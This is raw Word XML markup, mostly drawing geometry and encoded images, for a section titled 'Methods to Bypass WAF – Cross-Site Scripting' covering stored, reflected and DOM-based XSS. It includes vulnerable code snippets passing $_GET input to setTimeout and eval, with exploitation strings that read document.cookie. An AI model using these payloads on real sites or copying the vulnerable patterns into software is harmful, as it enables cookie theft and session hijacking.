                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 2428 2247"/>
                              <a:gd name="T43" fmla="*/ 2428 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 2429 2247"/>
                              <a:gd name="T47" fmla="*/ 242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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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2246"/>
                            <a:ext cx="57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\u003C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1" o:spid="_x0000_s2160" style="position:absolute;margin-left:96.5pt;margin-top:112.35pt;width:28.6pt;height:9.15pt;z-index:-15491584;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,2247" coordsize="57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">
                <v:shape id="Freeform 193" o:spid="_x0000_s2161" style="position:absolute;left:1930;top:2246;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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uJ7sQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTUvDQBC9F/wPywje2k1rqTZ2G6SYqjeNIngbs2MS&#10;kp2Nu9s0/vuuUPA2j/c5m2w0nRjI+caygvksAUFcWt1wpeD9LZ/egvABWWNnmRT8kodsezHZYKrt&#10;kV9pKEIlYgj7FBXUIfSplL6syaCf2Z44ct/WGQwRukpqh8cYbjq5SJKVNNhwbKixp11NZVscjIJ2&#10;fz383Lx89l/rj0e31FX7bPIHpa4ux/s7EIHG8C8+u590nL+ew98z8QK5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bie7EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m550,182r-529,l18,181,,161r,-3l,21,21,,550,r21,21l571,161r-18,20l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,2429;21,2429;18,2428;0,2408;0,2405;0,2268;21,2247;550,2247;571,2268;571,2408;553,2428;550,2429" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 192" o:spid="_x0000_s2162" type="#_x0000_t202" style="position:absolute;left:1930;top:2246;width:57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/hMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPyxR6q5t6kCa6BikWhII0xoPHaXZM&#10;lmRn0+xq4r/vFgq9zeN9zjqfbCduNHjjWMHLPAFBXDltuFZwKt+fX0H4gKyxc0wK7uQh38we1php&#10;N3JBt2OoRQxhn6GCJoQ+k9JXDVn0c9cTR+7iBoshwqGWesAxhttOLpJkKS0ajg0N9vTWUNUer1bB&#10;9szFznwfvj6LS2HKMk34Y9kq9fQ4bVcgAk3hX/zn3us4P13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r/hM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\u003C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rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:before="213"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Methods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Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Cross-Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="218"/>
      </w:pPr>
      <w:r>
        <w:t>General</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>issues</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Stored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XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>managed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push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>through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filter,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>wouldn’t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able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prevent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attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>conduction.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS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JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="13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2540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129540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="187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386080"/>
                          <a:chOff x="1614" y="204"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="188" name="Freeform 190"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="203"/>
                            <a:ext cx="8700" cy="608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811 204"/>
                              <a:gd name="T3" fmla="*/ 811 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 811 204"/>
                              <a:gd name="T7" fmla="*/ 811 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 810 204"/>
                              <a:gd name="T11" fmla="*/ 810 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 790 204"/>
                              <a:gd name="T15" fmla="*/ 790 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 787 204"/>
                              <a:gd name="T19" fmla="*/ 787 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 225 204"/>
                              <a:gd name="T23" fmla="*/ 225 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 204 204"/>
                              <a:gd name="T27" fmla="*/ 204 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 204 204"/>
                              <a:gd name="T31" fmla="*/ 204 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 225 204"/>
                              <a:gd name="T35" fmla="*/ 225 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 790 204"/>
                              <a:gd name="T39" fmla="*/ 790 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 810 204"/>
                              <a:gd name="T43" fmla="*/ 810 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 811 204"/>
                              <a:gd name="T47" fmla="*/ 811 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="607"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="583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586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="606"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="6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03"/>
                            <a:ext cx="8700" cy="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b/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spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="664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Example: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&lt;script&gt;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...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setTimeout(\\"writetitle()\\",$\_GET\[xss\])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...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2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&lt;/script&gt;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7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Exploitation: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/?xss=500);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alert(document.cookie);//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8" o:spid="_x0000_s2163" style="position:absolute;margin-left:80.7pt;margin-top:10.2pt;width:435pt;height:30.4pt;z-index:-15491072;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,204" coordsize="8700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">
                <v:shape id="Freeform 190" o:spid="_x0000_s2164" style="position:absolute;left:1614;top:203;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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8fzMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvDMAyF74P9B6PBLmN1tkMX0rqlDAqlUGizXXYT&#10;sRqHxLKJ3Tb799OhsJvEe3rv03I9+UFdaUxdYANvswIUcRNsx62B76/tawkqZWSLQ2Ay8EsJ1qvH&#10;hyVWNtz4RNc6t0pCOFVowOUcK61T48hjmoVILNo5jB6zrGOr7Yg3CfeDfi+KufbYsTQ4jPTpqOnr&#10;izcwHdx29/KzP5/6eQz1Rzj2HI/GPD9NmwWoTFP+N9+vd1bwS6GVZ2QCv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bx/MxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8679,607l21,607r-3,-1l,586r,-3l,21,21,,8679,r21,21l8700,586r-18,20l8679,607xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,811;21,811;18,810;0,790;0,787;0,225;21,204;8679,204;8700,225;8700,790;8682,810;8679,811" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 189" o:spid="_x0000_s2165" type="#_x0000_t202" style="position:absolute;left:1614;top:203;width:8700;height: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7KMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin0Vjf1IEnqGqS0IBSKMR56nGbH&#10;ZEl2Ns1uNf57VxC8zeN9zrKYbC+ONHrjWMHrLAFBXDttuFGwrz5fUhA+IGvsHZOCM3koVo8PS8y1&#10;O3FJx11oRAxhn6OCNoQhl9LXLVn0MzcQR+7gRoshwrGResRTDLe9nCfJQlo0HBtaHOi9pbrb/VsF&#10;6x8uP8zf9++2PJSmqrKEvxadUs9P0/oNRKAp3MU390bH+WkG12fiBXJ1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f7KMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==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b/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spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="664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Example:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="41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&lt;script&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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...</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="41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setTimeout(\\"writetitle()\\",$\_GET\[xss\])</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="4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...</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="42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&lt;/script&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-7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Exploitation:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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/?xss=500);</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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alert(document.cookie);//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3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>DOM-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="2"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="13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25920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128905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="184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386080"/>
                          <a:chOff x="1614" y="203"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="185" name="Freeform 187"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="203"/>
                            <a:ext cx="8700" cy="608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811 203"/>
                              <a:gd name="T3" fmla="*/ 811 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 811 203"/>
                              <a:gd name="T7" fmla="*/ 811 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 810 203"/>
                              <a:gd name="T11" fmla="*/ 810 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 790 203"/>
                              <a:gd name="T15" fmla="*/ 790 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 787 203"/>
                              <a:gd name="T19" fmla="*/ 787 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 224 203"/>
                              <a:gd name="T23" fmla="*/ 224 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 203 203"/>
                              <a:gd name="T27" fmla="*/ 203 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 203 203"/>
                              <a:gd name="T31" fmla="*/ 203 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 224 203"/>
                              <a:gd name="T35" fmla="*/ 224 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 790 203"/>
                              <a:gd name="T39" fmla="*/ 790 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 810 203"/>
                              <a:gd name="T43" fmla="*/ 810 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 811 203"/>
                              <a:gd name="T47" fmla="*/ 811 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="608"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584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587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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03"/>
                            <a:ext cx="8700" cy="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b/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spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="3809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pacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>Example: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7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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;script&gt;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7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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>...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7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eval($\_GET\[xss\]);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6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...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7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&lt;/script&gt;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83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Exploitation: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/?xss=document.cookie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5" o:spid="_x0000_s2166" style="position:absolute;margin-left:80.7pt;margin-top:10.15pt;width:435pt;height:30.4pt;z-index:-15490560;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,203" coordsize="8700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">
                <v:shape id="Freeform 187" o:spid="_x0000_s2167" style="position:absolute;left:1614;top:203;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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6wUsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CDfYy9B0g2mpRhFBEGGg1RffjuZs&#10;SptLaDKt//0yEHy7j+/nzZeD7cSV+tA4VvA5zkAQV043XCs4HTejHESIyBo7x6TgTgGWi9eXORba&#10;3fhA1zLWIoVwKFCBidEXUobKkMUwdp44cRfXW4wJ9rXUPd5SuO3kV5ZNpMWGU4NBT2tDVVv+WgXD&#10;j9lsP867y6GdeFdO3b5lv1fq/W1YzUBEGuJT/HBvdZqff8P/M+kC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brBSwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m8679,608l21,608r-3,-1l,587r,-3l,21,21,,8679,r21,21l8700,587r-18,20l8679,608xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,811;21,811;18,810;0,790;0,787;0,224;21,203;8679,203;8700,224;8700,790;8682,810;8679,811" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 186" o:spid="_x0000_s2168" type="#_x0000_t202" style="position:absolute;left:1614;top:203;width:8700;height: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hvWsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1nQ9FO0aRRYFQZCt3cMeZ5ux&#10;DTaT2kSt/34jCN7m8T5nvuxtI67UeeNYwcc4AUFcOm24UvBTbN6nIHxA1tg4JgV38rBcDN7mmGl3&#10;45yuh1CJGMI+QwV1CG0mpS9rsujHriWO3NF1FkOEXSV1h7cYbhs5SZJUWjQcG2ps6aum8nS4WAWr&#10;X87X5rz/+86PuSmKWcK79KTUaNivPkEE6sNL/HRvdZw/TeHxTLx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G9awgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA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b/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spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="3809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pacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>Example:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;script&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>...</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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eval($\_GET\[xss\]);</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-16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...</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-17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&lt;/script&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-83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Exploitation:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E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/?xss=document.cookie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3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="101"/>
        <w:ind w:left="464"/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15972352" behindDoc="0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114300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="183" name="Freeform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29 180"/>
                            <a:gd name="T3" fmla="*/ 229 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 229 180"/>
                            <a:gd name="T7" fmla="*/ 229 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 228 180"/>
                            <a:gd name="T11" fmla="*/ 228 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 208 180"/>
                            <a:gd name="T15" fmla="*/ 208 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 201 180"/>
                            <a:gd name="T19" fmla="*/ 201 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 180 180"/>
                            <a:gd name="T23" fmla="*/ 180 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 180 180"/>
                            <a:gd name="T27" fmla="*/ 180 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 204 180"/>
